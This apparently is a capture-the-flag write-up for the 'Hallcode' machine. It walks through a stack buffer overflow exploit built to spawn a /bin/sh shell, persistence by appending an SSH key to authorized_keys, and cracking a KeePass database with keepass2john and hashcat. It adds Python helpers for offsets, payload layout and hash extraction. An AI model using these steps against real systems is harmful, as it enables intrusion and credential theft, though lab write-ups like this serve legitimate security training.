Hello everyone!
This week's victim is Hallcode.
In gdb, the "info functions" command lists the functions that exist in the application.
Now let's create 200 bytes of data with the "pattern create" command, run the application and feed it that data.
pattern create 200
Sending 200 bytes crashed the application, but we don't yet know after how many bytes the crash happens. We now use the "registers" command to list all registers and read the 64-bit value at rsp, the stack pointer, which always points to the top of the current stack frame. On x86-64 a return address overwritten with pattern bytes is not a canonical address, so the "ret" instruction itself faults: RIP is unchanged at the moment of the crash, and the pattern bytes that would have become the return address are still sitting at the top of the stack, where rsp points.
pattern search $rsp
From "pattern search" we learn that the overflow reaches the saved return address after 120 bytes: bytes 1 to 120 fill everything up to the saved return address, bytes 121 to 128 overwrite the return address itself, and anything written after that is still on the stack, directly above the return address. Because "ret" pops the return address, rsp points exactly at those extra bytes the moment control is transferred. So we can place the code we want to run in the input right after the return address and redirect RIP to it with a "jmp rsp" gadget (JMP RSP).
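To make concrete what "pattern create" and "pattern search" do, and why the value at rsp gives the offset, here is an added Python example. It is my own code, not the author's exploit and not the GEF/pwndbg implementation: it generates a Metasploit-style cyclic pattern, recovers the offset of the value a crashed process left at the top of the stack, and lays out filler, return address and payload in the order the "jmp rsp" technique needs. GEF and pwndbg build their patterns from a different alphabet, so offsets from this script only apply to patterns this script produced; the crashed register value, gadget address and shellcode bytes in the usage part are constructed placeholders.

```python
import string
import struct


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern 'Aa0Aa1Aa2...' of exactly `length` bytes.

    Each 3-byte group is (uppercase, lowercase, digit), so any 4-byte window
    is unique within one 20280-byte period and pins down a single offset."""
    out = bytearray()
    while len(out) < length:
        for upper in string.ascii_uppercase:
            for lower in string.ascii_lowercase:
                for digit in string.digits:
                    out += (upper + lower + digit).encode()
                    if len(out) >= length:
                        return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(value, length: int = 20280):
    """Offset of `value` in the pattern, or None if it is not part of it.

    `value` is either the bytes seen in memory or the integer a debugger prints
    for a register. Registers are little-endian, so the integer is packed back
    into memory byte order first; trailing NULs (an overwrite that covered fewer
    than 8 bytes) are dropped before searching."""
    if isinstance(value, int):
        value = struct.pack("<Q", value).rstrip(b"\x00")
    if not value:
        return None          # an all-zero register is not a pattern hit
    index = pattern_create(length).find(value)
    return None if index < 0 else index


def return_address_offset(top_of_stack: int, pattern_length: int) -> int:
    """Padding length before the saved return address.

    On x86-64 a return address overwritten with pattern bytes is not canonical,
    so `ret` itself faults: RIP is unchanged and the would-be return address is
    still the 8 bytes at [rsp]. That is why the value at rsp, not RIP, is
    searched for."""
    offset = pattern_offset(top_of_stack, pattern_length)
    if offset is None:
        raise ValueError("value not found in the pattern; was the input this pattern?")
    return offset


def jmp_rsp_payload(offset: int, jmp_rsp_gadget: int, shellcode: bytes) -> bytes:
    """Layout for the 'jmp rsp' technique.

    `ret` pops the gadget address, which leaves rsp pointing at the very next
    bytes of our input; `jmp rsp` then executes them, so the shellcode goes
    directly after the overwritten return address."""
    if offset < 0:
        raise ValueError("offset must be non-negative")
    return b"A" * offset + struct.pack("<Q", jmp_rsp_gadget) + shellcode


if __name__ == "__main__":
    # 1. feed pattern_create(200) to the program and let it crash
    # 2. read the 64-bit value at the top of the stack from the register dump
    #    (constructed here: the 8 pattern bytes that sit at offset 120)
    crashed_top_of_stack = struct.unpack("<Q", pattern_create(200)[120:128])[0]
    offset = return_address_offset(crashed_top_of_stack, 200)
    print("return address is overwritten after", offset, "bytes")
    # 3. placeholders: the real gadget address comes from the binary, the
    #    shellcode from the exploit
    payload = jmp_rsp_payload(offset, 0xDEADBEEF, b"\xcc" * 8)
    print(len(payload), "byte payload")
```

Feed the output of pattern_create() to the program, take the value at the top of the stack from the register dump after the crash, and pass it to return_address_offset(); the result is the number of filler bytes to put before the overwritten return address.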
2- Initial Foothold and Exploit Development
Every program becomes machine language when compiled, and machine code can be converted back into assembly; this is called disassembly. Now that "info functions" has shown us the functions, let's disassemble the testing function and dive into its assembly code.
With the JMP instruction we can jump anywhere in the program. If we can place the value we want at rsp, we will be able to call system() using the r13 label.
Using system(), we can execute any command that can run in a terminal, if the operating system allows it. For example, calling system("/bin/sh") on Linux gives us a shell.
python exploit.py > chain
break *0x401156
r < chain
After starting gdb, I set a breakpoint at 0x401156 so that execution stops there. This lets us determine which register holds the "/bin/sh" string.
As seen in Figure – 19, "/bin/sh" is visible at the top of the stack, where rsp points. Now we use the "si" command to step one instruction at a time and follow where "/bin/sh" goes from rsp.
The mov instruction copies the "/bin/sh" value at rsp into rdi, the register that carries the first argument under the x86-64 System V calling convention, so it becomes the argument of system(). Let's use "si" again.
As you can see, the call instruction invokes system() with "/bin/sh" as its argument. The figure above boils down to: system("/bin/sh")
Now we will connect to port 1337 and do the same from there. To do this, we add the socket code needed to make the connection to the Python file.
3- Privilege Escalation
Now we need to download the files in Figure – 23. Remember that port 22 was open, so we can use it to connect to the remote machine. First we have to add our SSH public key to the user's authorized_keys file in the .ssh folder; otherwise our connection request will be rejected. Generate a key pair with the following command:
ssh-keygen -t rsa
We append the public key we just created to authorized_keys on the target machine (appending with >> keeps any keys that are already there instead of overwriting them):
echo "your key" >> .ssh/authorized_keys
Since we can now establish an SSH connection, we can transfer files with the scp command. Secure Copy (scp) transfers files between two hosts over SSH. The command is used as follows (the glob is quoted so the remote side expands it, and the trailing dot is the local destination):
scp -i id_rsa 'firstname.lastname@example.org:*' .
We see six landscape images, the myapp binary, the user flag and a file with the .kdbx extension. A .kdbx file is a KeePass database: KeePass is a password manager that stores your accounts and passwords for various websites in an encrypted vault on the client (or on a server) so that you can use them easily when needed.
After looking at KeePass, I understand that one of these six images may be the key file for "MyPasswords.kdbx", which would let us open the database holding the passwords.
What we need to do is download the keepass2john.py script and extract the hashes from the "MyPasswords.kdbx" database, using each picture as the candidate key file.
NOTE: I used my virtual Kali machine because I was getting an error while using a tool called keepass2john.
for i in *.JPG; do python keepass2john.py "$i" MyPasswords.kdbx | sed "s/MyPasswords/$i/g"; done
The for loop runs over all the pictures and calls keepass2john once per picture, using that picture as the key file, so we get one hash line per candidate. Every line starts with the database name in the "user" field, so sed replaces it with the picture's file name; that way, once a hash is cracked, we can tell which picture was the right key file. After this, we copy the output into a file.
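The same candidate-key-file workflow as an added Python example (my own code, not the author's one-liner): it runs keepass2john once per candidate, relabels only the user field of each hash line so the hash itself is never touched, and maps the labels in "hashcat --show --user" output back to the winning key file. The argument order keepass2john.py <keyfile> <kdbx> is the one the page uses and the script is assumed to sit in the current directory; the sample hash line and the hashcat output in the test are constructed, with placeholder hex fields.

```python
import subprocess
from pathlib import Path

# Constructed sample of a keepass2john output line: the database name as the
# 'user' field, a colon, then the $keepass$ hash. The hex fields are placeholders.
SAMPLE_LINE = "MyPasswords:$keepass$*2*60000*222*0a1b*2c3d*4e5f*6a7b*8c9d*1*64*aabb"

# assumption: keepass2john.py is in the current directory and takes <keyfile> <kdbx>
KEEPASS2JOHN = ["python", "keepass2john.py"]


def relabel(line: str, label: str) -> str:
    """Replace the user field (everything before the first ':') with `label`.

    Unlike a global sed substitution this never edits the hash itself, so a
    database whose name also appears inside the hash text stays intact."""
    user, sep, rest = line.rstrip("\n").partition(":")
    if sep != ":" or not rest.startswith("$keepass$"):
        raise ValueError("not a keepass2john hash line: %r" % line)
    return "%s:%s" % (label, rest)


def hashes_for_candidates(kdbx: str, candidates) -> list:
    """One labelled hash line per candidate key file.

    Each candidate is passed to keepass2john as the key file; the resulting
    line is labelled with the candidate's file name."""
    lines = []
    for keyfile in candidates:
        out = subprocess.run(KEEPASS2JOHN + [str(keyfile), kdbx],
                             capture_output=True, text=True, check=True).stdout
        for line in out.splitlines():
            if line.strip():
                lines.append(relabel(line, Path(keyfile).name))
    return lines


def cracked_keyfiles(show_output: str) -> dict:
    """Map labels back to passwords from `hashcat --show --user` output.

    Assumed line format: 'user:hash:password'. The hash contains no colon,
    so the password keeps any colons it may contain."""
    found = {}
    for line in show_output.splitlines():
        if not line.strip():
            continue
        label, _, rest = line.partition(":")
        hash_part, sep, password = rest.partition(":")
        if sep and hash_part.startswith("$keepass$"):
            found[label] = password
    return found


if __name__ == "__main__":
    lines = hashes_for_candidates("MyPasswords.kdbx", sorted(Path(".").glob("*.JPG")))
    Path("keepass_hashes").write_text("\n".join(lines) + "\n")
    print("wrote %d candidate hashes; now run:" % len(lines))
    print("hashcat -m 13400 -O keepass_hashes rockyou.txt --user")
```

Once hashcat has finished, feed the output of "hashcat -m 13400 keepass_hashes --show --user" to cracked_keyfiles(); the key of the returned dictionary is the image that worked as key file and the value is the master password.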
I go back to my physical machine to crack the password, because the process is slower in the virtual machine.
hashcat -h | grep -i keepass
hashcat -m 13400 -O keepass_hashes rockyou.txt --user --force
The result came back quickly because I had already cracked it earlier. As seen in the figure, we find that the picture named IMG_0547.JPG is the key file and the database password is "bullshit". Now I will install KeePass on my Windows 10 virtual machine and try the key file and password we found.
After copying the password, I go back to the physical machine and reconnect with the SSH key I created earlier.
I can say that it is one of the most enjoyable machines I have solved… We’re at the end of our Ha